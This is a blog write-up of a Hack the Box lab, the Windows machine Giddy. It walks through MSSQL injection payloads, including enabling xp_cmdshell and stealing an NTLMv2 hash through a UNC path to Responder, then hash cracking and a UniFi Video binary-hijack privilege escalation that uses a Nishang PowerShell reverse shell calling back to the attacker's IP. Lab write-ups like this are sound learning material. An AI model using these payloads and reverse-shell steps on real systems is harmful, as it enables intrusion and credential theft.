Hello Everyone, in today’s blog post we will be rooting Windows Machine from Hack the Box – Giddy.
1)Starting it off with nmap / rustscan to check for open ports:
data:image/s3,"s3://crabby-images/9ba9e/9ba9e5d3438bb64c720e043dc1b490637d9f14e6" alt=""
Ports 80 & 443 are open indicating running web servers. Let’s take a closer look.
2)Both 80 & 443 are the same in terms of landing page:
data:image/s3,"s3://crabby-images/ebd58/ebd5844e84b1d01839cf5c03102249ca9c31573b" alt=""
2.1)Nothing too much going on here, so I decided to perform subdomain and directory busting on both 443 and 80. Upon using dirsearch to see if there are any hidden directories I found /remote/login on port 80, and this is Windows Web Shell which is very interesting since we would have command execution on the underlying host this way if we know the username and password to authenticate with. (Note that Windows Web Shell requires SSL connection so I will be navigating to it on port 443, e.g. HTTPS)
data:image/s3,"s3://crabby-images/c1d4f/c1d4f14487214bd1f7e083a37c1b5f6ac6bf9096" alt=""
data:image/s3,"s3://crabby-images/7cce8/7cce8ee949822eb10238d92673ac612ba996f104" alt=""
I tried some common username / password combination with Computer Name set to Giddy but that didn’t work out, so I moved on.
3)When it comes to directory busting I like to use multiple different tools with different wordlists. Gobuster didn’t find anything different than dirsearch but then ffuf found interesting directory /mvc:
data:image/s3,"s3://crabby-images/c9bcb/c9bcb97ef679868e397b1cda31a7819e1d2267bc" alt=""
Navigating to it reveals a completely different website!
data:image/s3,"s3://crabby-images/a891a/a891a5f2a6d96be259d41c96c6ddfed55b04d97b" alt=""
3.1)There is an option to register and login but I didn’t find anything interesting related to those 2 functionalities. However, there is a search functionality as well vulnerable to SQL Injection!
By inputting classic single quote (‘) to check how app handles it, we got verbose MS SQL Error message which reveals type of Database being used and also indicates that user input is directly concatinated in SQL Query instead of using prepared statements leading to SQL Injection
data:image/s3,"s3://crabby-images/31ef4/31ef48888d5f7cdf06ac521a73ff1c61fcad245c" alt=""
data:image/s3,"s3://crabby-images/2d65b/2d65bcbe2c6cbc3ddc27757588b599fe94466e5d" alt=""
3.2)To confirm this indeed we can try Boolean-based SQL Injection payload, such as:
test' OR 1=1--
data:image/s3,"s3://crabby-images/a0783/a078382cc393f7047792a185674ae19cf168b9a5" alt=""
It works!
3.3)Right away I tried payload such as:
test';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell '<COMMAND>
But that didn’t work out, it can be due to various reasons, such as insufficient privileges, etc.
3.4)I decided to run sqlmap to check if I can dump the database faster that way or maybe even get a command execution: I saved the request from Burp and with -p flag I indicated vulnerable parameters so that sqlmap doesn’t have to manually test for multiple other parameters that are being passed in POST Request Body. Indeed sqlmap quickly identified SQL injection as well:
data:image/s3,"s3://crabby-images/29687/29687f327bd87fb067e9f32955b2c6c4dbcbbaf3" alt=""
data:image/s3,"s3://crabby-images/03a56/03a56379958874d7f743516e5e7170074cd98138" alt=""
However when I tried to dump the database with –dump flag that didn’t work out, so I switched back to the manual approach. Upon checking other interesting payloads related to SQL injection in MS SQL Server I came across this one which can be used to steal NTLMv2 hash by pointing out SQL Server vulnerable to SQL Injection to our Responder running locally. This is possible because MSSQL supports stacked queries and from the sqlmap output we know that this search function of the app is vulnerable to stacked queries (see screenshot above)
data:image/s3,"s3://crabby-images/30476/30476064eeb6760dc937c1a829911980ead7f7db" alt=""
Okay, cool! Let’s start Responder on our Kali:
sudo responder -I tun0
Then input the payload from the screenshot above into the search functionality and we got the NTLMv2 hash from user Stacy!
data:image/s3,"s3://crabby-images/65ec7/65ec7296f003105596afa523e65e9b5fd1f4ab3d" alt=""
We can then crack it with hashcat
hashcat -m 5600 hash.txt rockyou.txt
data:image/s3,"s3://crabby-images/5ee20/5ee20a0c1e268045864e75e103eb084eab1962ab" alt=""
Great now we have username and password. Now we can choose how to authenticate to the machine, this can be done either through the Windows Web Shell or we can leverage the fact that port 5985 is also open and use evil-wirnm and I will do just that:
data:image/s3,"s3://crabby-images/fb49c/fb49c53394faa753b305846f758279ff57fc9f81" alt=""
And we got user.txt!
4)After some manual enumeration I didn’t find anything much interesting so I decided to transfer Winpeas (I used wget), but it’s being blocked on this Host, however since I downloaded it to the Documents directory of user Stacy , upon executing dir I noticed another interesting file being there —> unifivideo
data:image/s3,"s3://crabby-images/2ab0f/2ab0ff64b244277ededeeac1ec40888c9648f972" alt=""
Since I didn’t hear before about it, I decided to do a quick google search about it. And right away I found Local Privilege Escalation related to Ubiquiti UnifiVideo!
data:image/s3,"s3://crabby-images/c0b0d/c0b0d4c288c6e5222d4c0f352f29bfd0dce163c3" alt=""
4.1)Description of this vulnerability is very well done:
data:image/s3,"s3://crabby-images/6c7b8/6c7b8019a180116f3686cc43a38c9a4d5dc9953c" alt=""
4.2)Let’s get to it! So I will create locally malicious taskkill.exe and transfer it to the target machine at C:\ProgramData\unifi-video\ since I have write access to it.
4.2.1)First create exploit.c with our malicious code:
Essentially we are grabbing and executing shell.ps1 from our machine with powershell by staring simple python server on port 8000. Shell.ps1 is Nishang’s PowerShell reverse shell script
data:image/s3,"s3://crabby-images/6c39a/6c39ab500e46279b2921475b785a3e3856ea3a20" alt=""
4.2.2)Then compile it to .exe:
data:image/s3,"s3://crabby-images/bee7e/bee7e455bd131f5567ab8718f998793ddc34324d" alt=""
4.2.3)Then transfer it victim machine and name it taskkill.exe
data:image/s3,"s3://crabby-images/3fdc7/3fdc7ba787f8dde8c466844eb61f905cc32c9e75" alt=""
4.3)Okay so now we are ready to pull of the exploit
4.3.1)Start a simple Python server at the directory where Nishang’s reverse shell payload is located:
python3 -m http.server
Also, make sure to add the following line of the code to the very end of Nishang’s reverse shell powershell script:
Invoke-PowerShellTCP -Reverse -IPAddress <OUR_IP> -Port <OUR_PORT>
4.3.2)Then start netcta listener at the port specific in the code snippet above, e.g.:
nc -lvnp 1234
4.3.3)Now it’s time to start and stop UniFiVideoService so we can trigger our malicious taskkill.exe. I wasn’t able to do so with net start and net stop commands like I would usually do when dealing with Binary Hijacking on Windows Machines. As a Plan B I will use sc command:
So first we stop the service:
data:image/s3,"s3://crabby-images/151bc/151bccbfcec6f4c4e1520720492300735d14638e" alt=""
Then we can check for the status of the service and then start it again:
data:image/s3,"s3://crabby-images/1d039/1d039801a9ca7cba1a9e16e1d7247f0d4fb744a8" alt=""
Upon starting the service again our taskkill.exe is being triggered and we can observe the request to our Python server first:
data:image/s3,"s3://crabby-images/c4f6c/c4f6c248a9f2bfa481d53e2ebccbff2b5c9a9d37" alt=""
After that we got a reverse shell on our netcat listening port:
data:image/s3,"s3://crabby-images/e474b/e474bb9981a683cc08f92041d7bc5e584d2683ad" alt=""
And we got root.txt! GG!
Lessons Learned
1)I learned about very cool MSSQL UNC Path payload when we are dealing with SQL Injection with Microsoft SQL Server which can be used to steal NTLMv2 Hash with Responder
2) The second lesson that I learned is about Ubiquiti UnifiVideo Local Privilege Escalation which was also very interesting.
Leave a Reply